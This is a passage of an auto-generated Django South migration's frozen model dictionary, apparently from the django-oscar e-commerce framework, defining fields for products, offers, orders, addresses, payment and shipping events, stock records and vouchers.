'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
u'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.ProductAttribute']", 'through': u"orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Category']", 'through': u"orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': u"orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'products'", 'null': 'True', 'to': u"orm['catalogue.ProductClass']"}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'rating': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Product']", 'symmetrical': 'False', 'through': u"orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': u"orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
u'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': u"orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
u'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.ProductAttribute']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': u"orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Category']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"})
},
u'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': u"orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'customer.communicationeventtype': {
'Meta': {'object_name': 'CommunicationEventType'},
'category': ('django.db.models.fields.CharField', [], {'default': "u'Order related'", 'max_length': '255'}),
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'email_body_html_template': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email_body_template': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email_subject_template': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'sms_template': ('django.db.models.fields.CharField', [], {'max_length': '170', 'null': 'True', 'blank': 'True'})
},
u'offer.benefit': {
'Meta': {'object_name': 'Benefit'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_affected_items': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
u'offer.condition': {
'Meta': {'object_name': 'Condition'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
u'offer.conditionaloffer': {
'Meta': {'ordering': "['-priority']", 'object_name': 'ConditionalOffer'},
'benefit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Benefit']"}),
'condition': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Condition']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_basket_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_discount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'max_global_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_user_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'num_applications': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offer_type': ('django.db.models.fields.CharField', [], {'default': "'Site'", 'max_length': '128'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'redirect_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '64'}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
u'offer.range': {
'Meta': {'object_name': 'Range'},
'classes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'classes'", 'blank': 'True', 'to': u"orm['catalogue.ProductClass']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'excluded_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'excludes'", 'blank': 'True', 'to': u"orm['catalogue.Product']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'included_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': u"orm['catalogue.Category']"}),
'included_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'through': u"orm['offer.RangeProduct']", 'to': u"orm['catalogue.Product']"}),
'includes_all_products': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'})
},
u'offer.rangeproduct': {
'Meta': {'unique_together': "(('range', 'product'),)", 'object_name': 'RangeProduct'},
'display_order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['offer.Range']"})
},
u'order.billingaddress': {
'Meta': {'object_name': 'BillingAddress'},
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['address.Country']"}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'line1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'line2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'line3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'line4': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'postcode': ('oscar.models.fields.UppercaseCharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'search_text': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
},
u'order.communicationevent': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'CommunicationEvent'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['customer.CommunicationEventType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'communication_events'", 'to': u"orm['order.Order']"})
},
u'order.line': {
'Meta': {'object_name': 'Line'},
'est_dispatch_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_price_before_discounts_excl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'line_price_before_discounts_incl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'line_price_excl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'line_price_incl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'lines'", 'to': u"orm['order.Order']"}),
'partner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'order_lines'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['partner.Partner']"}),
'partner_line_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'partner_line_reference': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'partner_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'partner_sku': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'stockrecord': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['partner.StockRecord']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'unit_cost_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'unit_price_excl_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'unit_price_incl_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'unit_retail_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
u'order.lineattribute': {
'Meta': {'object_name': 'LineAttribute'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attributes'", 'to': u"orm['order.Line']"}),
'option': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'line_attributes'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['catalogue.Option']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'order.lineprice': {
'Meta': {'ordering': "('id',)", 'object_name': 'LinePrice'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'prices'", 'to': u"orm['order.Line']"}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'line_prices'", 'to': u"orm['order.Order']"}),
'price_excl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'price_incl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'shipping_excl_tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'}),
'shipping_incl_tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'})
},
u'order.order': {
'Meta': {'ordering': "['-date_placed']", 'object_name': 'Order'},
'basket': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['basket.Basket']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'billing_address': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['order.BillingAddress']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'GBP'", 'max_length': '12'}),
'date_placed': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'guest_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'shipping_address': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['order.ShippingAddress']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'shipping_code': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'blank': 'True'}),
'shipping_excl_tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'}),
'shipping_incl_tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'}),
'shipping_method': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'total_excl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'total_incl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'orders'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['{}']".format(AUTH_USER_MODEL)})
},
u'order.orderdiscount': {
'Meta': {'object_name': 'OrderDiscount'},
'amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'}),
'category': ('django.db.models.fields.CharField', [], {'default': "'Basket'", 'max_length': '64'}),
'frequency': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'offer_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'offer_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'discounts'", 'to': u"orm['order.Order']"}),
'voucher_code': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'voucher_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'order.ordernote': {
'Meta': {'object_name': 'OrderNote'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'note_type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notes'", 'to': u"orm['order.Order']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['{}']".format(AUTH_USER_MODEL), 'null': 'True'})
},
u'order.paymentevent': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'PaymentEvent'},
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['order.PaymentEventType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lines': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['order.Line']", 'through': u"orm['order.PaymentEventQuantity']", 'symmetrical': 'False'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payment_events'", 'to': u"orm['order.Order']"}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'shipping_event': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payment_events'", 'null': 'True', 'to': u"orm['order.ShippingEvent']"})
},
u'order.paymenteventquantity': {
'Meta': {'object_name': 'PaymentEventQuantity'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'line_quantities'", 'to': u"orm['order.PaymentEvent']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payment_event_quantities'", 'to': u"orm['order.Line']"}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'order.paymenteventtype': {
'Meta': {'ordering': "('name',)", 'object_name': 'PaymentEventType'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
u'order.shippingaddress': {
'Meta': {'object_name': 'ShippingAddress'},
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['address.Country']"}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'line1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'line2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'line3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'line4': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'phone_number': ('oscar.models.fields.PhoneNumberField', [], {'max_length': '128', 'blank': 'True'}),
'postcode': ('oscar.models.fields.UppercaseCharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'search_text': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
},
u'order.shippingevent': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'ShippingEvent'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['order.ShippingEventType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lines': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'shipping_events'", 'symmetrical': 'False', 'through': u"orm['order.ShippingEventQuantity']", 'to': u"orm['order.Line']"}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shipping_events'", 'to': u"orm['order.Order']"})
},
u'order.shippingeventquantity': {
'Meta': {'object_name': 'ShippingEventQuantity'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'line_quantities'", 'to': u"orm['order.ShippingEvent']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shipping_event_quantities'", 'to': u"orm['order.Line']"}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'order.shippingeventtype': {
'Meta': {'ordering': "('name',)", 'object_name': 'ShippingEventType'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
u'partner.partner': {
'Meta': {'object_name': 'Partner'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'partners'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['{}']".format(AUTH_USER_MODEL)})
},
u'partner.stockrecord': {
'Meta': {'unique_together': "(('partner', 'partner_sku'),)", 'object_name': 'StockRecord'},
'cost_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'low_stock_threshold': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'num_allocated': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'num_in_stock': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'partner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stockrecords'", 'to': u"orm['partner.Partner']"}),
'partner_sku': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'price_currency': ('django.db.models.fields.CharField', [], {'default': "'GBP'", 'max_length': '12'}),
'price_excl_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'price_retail': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stockrecords'", 'to': u"orm['catalogue.Product']"})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'voucher.voucher': {
'Meta': {'object_name': 'Voucher'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'date_created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
